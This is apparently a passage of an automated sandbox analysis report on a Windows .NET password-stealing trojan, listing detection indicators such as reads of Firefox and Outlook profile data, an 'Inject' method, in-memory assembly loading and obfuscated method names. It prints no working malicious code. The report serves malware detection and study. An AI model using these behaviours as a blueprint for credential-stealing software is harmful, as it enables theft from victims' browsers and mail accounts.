                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, TmEnIZLOqWm4t2waYK.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52f0000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ae3e40.4.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2adbe28.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2b295bc.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeMutant created: NULL
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeVirustotal: Detection: 30%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeString found in binary or memory: menuStrip1/addCarToolStripMenuItemFile1addCarToolStripMenuItem1
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: DHOe.pdbSHA256@`g source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe
                    Source: Binary string: DHOe.pdb source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, TmEnIZLOqWm4t2waYK.cs.Net Code: sSUKQuKFxU System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, TmEnIZLOqWm4t2waYK.cs.Net Code: sSUKQuKFxU System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                    Source: SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeStatic PE information: section name: .text entropy: 7.937152054368676
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.52b0000.10.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, zP3Sw1b647PecVj3MZ.csHigh entropy of concatenated method names: 'ToString', 'HiiOdAg4Ow', 'MJuOybHiFJ', 'wsqOG3NgFN', 'MbSOlZOlky', 'qVmOtWlovR', 'BkwO1nNMhj', 'GkBO0Tn2b1', 'pfZOJeQrYP', 'Ym6OPjqlg7'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, IgWa5u0pphRsdsPaLf.csHigh entropy of concatenated method names: 'pS6SkJXBkI', 'IiqSFcgOPJ', 'f7MScyZpsV', 'iGlcnAZatr', 'Vt5czV9BAZ', 'zanSemMi3v', 'PKMSh0gsUl', 'NDmSsj2SFE', 'S84SZadIgW', 'g8tSK4r2hQ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, JLn7D8hhjyvuoE2t3Qx.csHigh entropy of concatenated method names: 'ToString', 'OUUmZduf4i', 'pAYmKec4t8', 'l7MmCmobx5', 'l0GmkA5hBi', 'd1AmfmnbIw', 'yt7mFDQUfs', 'EHYmYJ2idI', 'zZ7oC094VIPCBP1Ww4g', 'VeZ7gU9Xa3gCsZmxrDD'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, YlF6wUzmcuXIeW2Ao7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SLjqXAN53h', 'iSyqjS0R8I', 'wxIqOofBrZ', 'yIUqgZ0AkO', 'ehdqEqCHfg', 'mkGqq892KU', 'ipeqmSemOg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, HKq2vk3JKxqu31jYBK.csHigh entropy of concatenated method names: 'SKufRIPT3l', 'RUyfVuPj87', 'hW5fbyUlI9', 'i4Mf9ItYE2', 'bmSf4cQNfa', 'vfJfHL4IAQ', 'zB6fIMQQkI', 'MdTfNDdWw6', 'M6cfTrdhX4', 'uvbfniZ8Zg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, tWNQkBKsg3DHlvRJSw.csHigh entropy of concatenated method names: 'F3yhSKq2vk', 'LKxhLqu31j', 'yZghATllOl', 'OKBhu5qiOa', 'P9Ihj40HIR', 'O39hOyDEME', 'jKRk1mXGZUxKxeUWX5', 'PPwJL3smd5OZQStNha', 'NHrhhl8XOi', 'QaGhZs2uVA'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, VIRd39ryDEMEwAMs8A.csHigh entropy of concatenated method names: 'YaycC1VrbN', 'uOZcfGq2TA', 'kiMcYZaLIu', 'RJ4cSi4Vev', 'cWrcLQyRAy', 'HuTY4ROAd1', 'kkoYH1T8q4', 'sRHYIEysk7', 't3SYNOMubL', 'X9dYT88BRQ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, KtbRCnPGV3g9JaCKWq.csHigh entropy of concatenated method names: 'WZESUKjWev', 'DitSwB6IpI', 'WFeSQatW0H', 'uAKSWf6Zea', 'sfRSB7ScTJ', 'AgMSMytU1E', 'sgvSpEkOnk', 'dmLS3u8Itn', 'uMkS5HQ10S', 'kHSSDJfJdr'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, EHvuMMF99SvB1dqti4.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'L0hsTun5gY', 'rcxsn3SmFw', 'svHszXG2bG', 'VmdZe8Pl7D', 'tg2ZhOE2bs', 'TdPZsY6MOY', 'wA0ZZ5gIAu', 'AMgkK2cuPhHgboQsaTe'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, AEtCUpnieagE1qWCO7.csHigh entropy of concatenated method names: 'lglqhUaDdZ', 'RFxqZSGZHT', 'W94qKuAN3S', 'BGDqkWwxWe', 'gayqfTOGhl', 'aK6qYFp1FJ', 'vfWqcltaVo', 'scJEIUJwx1', 'lO9ENm0S1U', 'dCxETuPQKo'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, TmEnIZLOqWm4t2waYK.csHigh entropy of concatenated method names: 'Bw0ZCXUlQi', 'wW5ZkoVfIH', 'vNYZf5oTHb', 'AMcZFkjXWv', 'JHGZYFaYLQ', 'IATZcurKrf', 'ONMZSBDOMg', 'pdcZLVuRMV', 'BAUZ2jBjCP', 'X7XZA8JGqq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, FBV1Dw5ZgTllOldKB5.csHigh entropy of concatenated method names: 'yX7FWJAZlx', 'bqwFMgC6MT', 'RqyF35P1FO', 'fP0F5ljHtS', 'VMJFjcYXic', 'yahFOtUEPE', 'oDyFghYJrd', 'veqFEBof3v', 'pwFFql5wwB', 'kwDFmKoVMS'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, i869fXTc1kNoXy0mU2.csHigh entropy of concatenated method names: 'MbTErPrpsB', 'dRtEyQVRlk', 'RbdEG3XK5M', 'kJAElQB2hR', 'bn3ERIxCNJ', 'C2lEtYf50u', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, kYDhL9f2h3WLGPBHn3.csHigh entropy of concatenated method names: 'Dispose', 'zZDhTU4D82', 'mJLsy5ZQZO', 'UGHQQHI7MA', 'MxAhnBfFrc', 'p0dhzBK6Gg', 'ProcessDialogKey', 'kWcse869fX', 'i1kshNoXy0', 'sU2ssBEtCU'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, vG3i1EsgSiNMtgnuiK.csHigh entropy of concatenated method names: 'kn9QZSw7U', 'agkWBBAQv', 'ghAMLnLe4', 'KeipKf2hC', 'jKt5arPE8', 'Ke0D8ZUwX', 'J7LmPKbhU92wTNLZEi', 'hEegOH0pIt5B2AY5sP', 'g8ME7fwDK', 'R1RmEiTCx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, wABfFrNcO0dBK6GgLW.csHigh entropy of concatenated method names: 'F17EkTSYZP', 'yQ0EfDMBqO', 'TisEFm0uEb', 'FM5EYoffxR', 'dd2Ecku1m6', 'bX1ESBJpJr', 'pIUELwRWoG', 'g3KE29VvFn', 'oLgEAWqOdZ', 'A8rEuD1Zp8'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, dco03Phe9sar7S4k4qp.csHigh entropy of concatenated method names: 'ocFqUcVbAD', 'hGjqwuMDJ1', 'ChPqQ5AtQw', 'tPdqWvxP92', 'GOfqBWIo7i', 'IaPqMOLnBe', 'DZJqpffwYH', 'GeCq3S1pNB', 'EqYq5owlsk', 'HZjqDsLeip'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, ywqai2H9nZfaNY0RN1.csHigh entropy of concatenated method names: 'sHxgNSeorL', 'RLMgnwEFEE', 'cYJEeq5pmg', 'oGuEhtWTPA', 'DKfgdH4XNk', 'PlKg7EqAuK', 'AtQgiAPEbM', 'yPwgRgo7On', 'jikgVcpr0U', 'BqJgblkGwS'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, edq3sdRYpWfB0PDWPH.csHigh entropy of concatenated method names: 'xHkj6TKamc', 'eUjj7q2VQ7', 'ubMjRHe2qi', 'QgtjVYmyeE', 'FdijyfoZXs', 'r5BjGjG4ME', 'UnGjlxO0Vg', 'NjJjtybJjn', 'Muuj1vHnlE', 'ctZj04sN4U'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.3e85af0.9.raw.unpack, PiQ4WTi95yVj42VZoG.csHigh entropy of concatenated method names: 'R8KX3FIFJb', 'kitX53abjg', 'JyeXrHMT4Y', 'TbbXyJephb', 'KLdXlMvhCi', 'r4OXtoZyHX', 'lmyX0VHYSL', 'tuRXJLofQJ', 'jiAX6lxIbn', 'pRGXdFtK0w'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, zP3Sw1b647PecVj3MZ.csHigh entropy of concatenated method names: 'ToString', 'HiiOdAg4Ow', 'MJuOybHiFJ', 'wsqOG3NgFN', 'MbSOlZOlky', 'qVmOtWlovR', 'BkwO1nNMhj', 'GkBO0Tn2b1', 'pfZOJeQrYP', 'Ym6OPjqlg7'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, IgWa5u0pphRsdsPaLf.csHigh entropy of concatenated method names: 'pS6SkJXBkI', 'IiqSFcgOPJ', 'f7MScyZpsV', 'iGlcnAZatr', 'Vt5czV9BAZ', 'zanSemMi3v', 'PKMSh0gsUl', 'NDmSsj2SFE', 'S84SZadIgW', 'g8tSK4r2hQ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, JLn7D8hhjyvuoE2t3Qx.csHigh entropy of concatenated method names: 'ToString', 'OUUmZduf4i', 'pAYmKec4t8', 'l7MmCmobx5', 'l0GmkA5hBi', 'd1AmfmnbIw', 'yt7mFDQUfs', 'EHYmYJ2idI', 'zZ7oC094VIPCBP1Ww4g', 'VeZ7gU9Xa3gCsZmxrDD'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, YlF6wUzmcuXIeW2Ao7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SLjqXAN53h', 'iSyqjS0R8I', 'wxIqOofBrZ', 'yIUqgZ0AkO', 'ehdqEqCHfg', 'mkGqq892KU', 'ipeqmSemOg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, HKq2vk3JKxqu31jYBK.csHigh entropy of concatenated method names: 'SKufRIPT3l', 'RUyfVuPj87', 'hW5fbyUlI9', 'i4Mf9ItYE2', 'bmSf4cQNfa', 'vfJfHL4IAQ', 'zB6fIMQQkI', 'MdTfNDdWw6', 'M6cfTrdhX4', 'uvbfniZ8Zg'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, tWNQkBKsg3DHlvRJSw.csHigh entropy of concatenated method names: 'F3yhSKq2vk', 'LKxhLqu31j', 'yZghATllOl', 'OKBhu5qiOa', 'P9Ihj40HIR', 'O39hOyDEME', 'jKRk1mXGZUxKxeUWX5', 'PPwJL3smd5OZQStNha', 'NHrhhl8XOi', 'QaGhZs2uVA'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, VIRd39ryDEMEwAMs8A.csHigh entropy of concatenated method names: 'YaycC1VrbN', 'uOZcfGq2TA', 'kiMcYZaLIu', 'RJ4cSi4Vev', 'cWrcLQyRAy', 'HuTY4ROAd1', 'kkoYH1T8q4', 'sRHYIEysk7', 't3SYNOMubL', 'X9dYT88BRQ'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, KtbRCnPGV3g9JaCKWq.csHigh entropy of concatenated method names: 'WZESUKjWev', 'DitSwB6IpI', 'WFeSQatW0H', 'uAKSWf6Zea', 'sfRSB7ScTJ', 'AgMSMytU1E', 'sgvSpEkOnk', 'dmLS3u8Itn', 'uMkS5HQ10S', 'kHSSDJfJdr'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, EHvuMMF99SvB1dqti4.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'L0hsTun5gY', 'rcxsn3SmFw', 'svHszXG2bG', 'VmdZe8Pl7D', 'tg2ZhOE2bs', 'TdPZsY6MOY', 'wA0ZZ5gIAu', 'AMgkK2cuPhHgboQsaTe'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, AEtCUpnieagE1qWCO7.csHigh entropy of concatenated method names: 'lglqhUaDdZ', 'RFxqZSGZHT', 'W94qKuAN3S', 'BGDqkWwxWe', 'gayqfTOGhl', 'aK6qYFp1FJ', 'vfWqcltaVo', 'scJEIUJwx1', 'lO9ENm0S1U', 'dCxETuPQKo'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, TmEnIZLOqWm4t2waYK.csHigh entropy of concatenated method names: 'Bw0ZCXUlQi', 'wW5ZkoVfIH', 'vNYZf5oTHb', 'AMcZFkjXWv', 'JHGZYFaYLQ', 'IATZcurKrf', 'ONMZSBDOMg', 'pdcZLVuRMV', 'BAUZ2jBjCP', 'X7XZA8JGqq'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, FBV1Dw5ZgTllOldKB5.csHigh entropy of concatenated method names: 'yX7FWJAZlx', 'bqwFMgC6MT', 'RqyF35P1FO', 'fP0F5ljHtS', 'VMJFjcYXic', 'yahFOtUEPE', 'oDyFghYJrd', 'veqFEBof3v', 'pwFFql5wwB', 'kwDFmKoVMS'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, i869fXTc1kNoXy0mU2.csHigh entropy of concatenated method names: 'MbTErPrpsB', 'dRtEyQVRlk', 'RbdEG3XK5M', 'kJAElQB2hR', 'bn3ERIxCNJ', 'C2lEtYf50u', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, kYDhL9f2h3WLGPBHn3.csHigh entropy of concatenated method names: 'Dispose', 'zZDhTU4D82', 'mJLsy5ZQZO', 'UGHQQHI7MA', 'MxAhnBfFrc', 'p0dhzBK6Gg', 'ProcessDialogKey', 'kWcse869fX', 'i1kshNoXy0', 'sU2ssBEtCU'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, vG3i1EsgSiNMtgnuiK.csHigh entropy of concatenated method names: 'kn9QZSw7U', 'agkWBBAQv', 'ghAMLnLe4', 'KeipKf2hC', 'jKt5arPE8', 'Ke0D8ZUwX', 'J7LmPKbhU92wTNLZEi', 'hEegOH0pIt5B2AY5sP', 'g8ME7fwDK', 'R1RmEiTCx'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, wABfFrNcO0dBK6GgLW.csHigh entropy of concatenated method names: 'F17EkTSYZP', 'yQ0EfDMBqO', 'TisEFm0uEb', 'FM5EYoffxR', 'dd2Ecku1m6', 'bX1ESBJpJr', 'pIUELwRWoG', 'g3KE29VvFn', 'oLgEAWqOdZ', 'A8rEuD1Zp8'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, dco03Phe9sar7S4k4qp.csHigh entropy of concatenated method names: 'ocFqUcVbAD', 'hGjqwuMDJ1', 'ChPqQ5AtQw', 'tPdqWvxP92', 'GOfqBWIo7i', 'IaPqMOLnBe', 'DZJqpffwYH', 'GeCq3S1pNB', 'EqYq5owlsk', 'HZjqDsLeip'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, ywqai2H9nZfaNY0RN1.csHigh entropy of concatenated method names: 'sHxgNSeorL', 'RLMgnwEFEE', 'cYJEeq5pmg', 'oGuEhtWTPA', 'DKfgdH4XNk', 'PlKg7EqAuK', 'AtQgiAPEbM', 'yPwgRgo7On', 'jikgVcpr0U', 'BqJgblkGwS'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, edq3sdRYpWfB0PDWPH.csHigh entropy of concatenated method names: 'xHkj6TKamc', 'eUjj7q2VQ7', 'ubMjRHe2qi', 'QgtjVYmyeE', 'FdijyfoZXs', 'r5BjGjG4ME', 'UnGjlxO0Vg', 'NjJjtybJjn', 'Muuj1vHnlE', 'ctZj04sN4U'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.74d0000.12.raw.unpack, PiQ4WTi95yVj42VZoG.csHigh entropy of concatenated method names: 'R8KX3FIFJb', 'kitX53abjg', 'JyeXrHMT4Y', 'TbbXyJephb', 'KLdXlMvhCi', 'r4OXtoZyHX', 'lmyX0VHYSL', 'tuRXJLofQJ', 'jiAX6lxIbn', 'pRGXdFtK0w'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exe.2ac6e2c.5.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.23449.29887.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
